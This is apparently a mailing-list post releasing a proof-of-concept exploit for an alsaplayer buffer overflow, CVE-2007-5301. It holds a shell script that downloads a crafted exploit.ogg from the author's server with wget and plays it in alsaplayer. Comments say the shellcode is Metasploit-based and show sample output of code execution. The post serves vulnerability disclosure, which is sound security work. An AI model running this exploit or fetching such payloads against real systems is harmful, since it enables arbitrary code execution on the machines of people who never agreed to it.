
alsaplayer PoC - exploit




Hello,

I have released this PoC for the alsaplayer bug CVE-2007-5301.

You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/ 

#!/bin/sh
#
# http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh 
#
# Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package 
# alsaplayer-common at version 0.99.76-9
#
# CVE-2007-5301 / DSA-1538
# 
# by Albert Sellarès - http://www.wekk.net
# 2008-04-09
#
# Shellcode is based on metasploit framework. If you want to test it in other 
# systems, maybe you have to recalculate offsets.
#
# Example:
# 
# whats@debian:~$ ./CVE-2007-5301-exploit.sh
# Alsaplayer buffer overflow < 0.99.80-rc3
# by Albert Sellarès - http://www.wekk.net
#
#
# --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg 
#            => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90 
# Connecting to www.wekk.net|64.22.71.90|:80... connected. 
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
# 
# 100%[===============================================================================>] 5,421 
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
#

echo -e "Alsaplayer buffer overflow < 0.99.80-rc3"
echo -e "by Albert Sellarès - http://www.wekk.net\n\n"
wget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg 
alsaplayer exploit.ogg



-- 
  Albert Sellarès        GPG id: 0x13053FFE
http://www.wekk.net whats_up@jabber.org
Member of Catux.org http://catux.org
  Linux User: 324456     Catalunya           



